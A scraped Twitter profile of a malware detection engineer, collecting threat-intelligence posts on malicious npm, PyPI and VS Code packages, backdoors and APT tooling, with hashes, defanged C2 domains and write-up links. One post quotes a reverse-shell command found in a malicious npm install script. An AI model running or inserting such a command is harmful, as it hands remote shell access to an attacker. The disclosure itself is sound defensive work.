Marius Benthin (@marius_benthin)'s Twitter Profile

Marius Benthin
@marius_benthin

Senior Detection Engineer @NextronSystems

ID: 897705563680911362
Website: https://www.marius-benthin.de
Joined: 16-08-2017 06:24:19

22 Tweets | 155 Followers | 322 Following

Jonathan Peters (@cod3nym):

Found a bunch of related low detection samples. They are live on abuse.ch MalwareBazaar

bazaar.abuse.ch/browse/tag/Myt…

Hashes:
d6a02f9ac2e9e675b88b28b9abda97e7
a29fedaa6fb77d626ae6690081002e15
5a749cb47bc62ae8adb00997b7c1875d
e180bd5b6524313c0c1f4ecc9a925e02
Nextron Research ⚡️ (@nextronresearch):

Beyond availability - toward verified recovery

Backups should do more than bring systems back online - they should bring them back clean.

Together with Veeam® Software, we’ve built an integration that adds forensic assurance to backup workflows.
THOR extends Veeam’s trusted recovery
Dr Petri ph (@petri_ph):

Simple but effective PAM backdoors — one is 3 years old — still showing _0 detections_ on VirusTotal.
All use hard-coded password checks to bypass authentication and spawn a shell.
All samples were uploaded by India-geolocated submitters 🇮🇳.

Hashes in reply.
Gameel Ali 🤘 (@malgamy12):

New backdoor called #kalim used by #muddywater APT group. Multi-threaded C2 tool with AES encryption, file transfer capabilities, and persistent command execution.
sample: virustotal.com/gui/file/0c807…
sample: virustotal.com/gui/file/2fb21…
c2: moodleuni[.]com
Florian Roth ⚡️ (@cyb3rops):

The SHA1-Hulud npm mess keeps growing, so we added additional detections for it today - new YARA rules by my colleague Marius Benthin in our public signature-base - cover bun_environment.js / setup_bun.js and the malicious preinstall script variants from the Wiz / Aikido

Marius Benthin (@marius_benthin):

NPM package "baidu-src-test*" spawning reverse shell on installation via (pre)install script.

sh -i >& /dev/tcp/43[.]160[.]194[.]214/53 0>&1

virustotal.com/gui/file/ee880…

Nextron Research ⚡️ #NPM #THOR
Nextron Research ⚡️ (@nextronresearch):

We spotted a malicious #VSCode (Visual Studio Code) extension today in our artifact-scanning pipeline. It appeared under a name that tries to pass itself off as the popular Material Icon Theme.

A new 5.29.1 version was pushed today (28.11., 11:34) and the update contains two Rust implants –
Nextron Research ⚡️ (@nextronresearch):

Follow-up on yesterday’s VS Code extension case: we finished the malware analysis of the Rust implants

Solana-based C2, AES-encrypted JS stages, and a Google Calendar fallback channel with invisible Unicode tricks

Write-up is here
nextron-systems.com/2025/11/29/ana…

by Marius Benthin
tuckner (@tuckner):

Glassworm returned in a big way during the holiday. We're tracking 23 code extensions across the VS Marketplace and Open VSX which copy popular extensions, evade filters, manipulate their download counts, and then update with sinister malware. secureannex.com/blog/glassworm…

Marius Benthin (@marius_benthin):

Malicious NPM package imitating expressjs/multer. It downloads payload from Google Firebase Storage.

npmjs.com/package/multer…

SHA-256: 3d3ebabe63cc6128194440210bffbafeac95c9a23bf294711a8637aa857b3648

#NPM #Google Nextron Research ⚡️
Jonathan Peters (@cod3nym):

We Nextron Research ⚡️ scan many public repos like npm, pypi, vscode marketplace etc.

And we find a lot of shitty malware :)

Example:
pypi.org/project/multit…

SHA256: 79cc98d0831e7b6a191000ec997ebc1853b1f6cc1190dbb855b97d7bf418c287

#PyPi
Jonathan Peters (@cod3nym):

This is more fun than I anticipated :D
Another malicious NPM package found and identified by our automatic package repo scanning powered by THOR

PKG: npmjs.com/package/extend…

SHA256: 5f1830432909d7adc3bbfc3b33d60234460a0d763214578ed339040431767b97

0 Detections on VirusTotal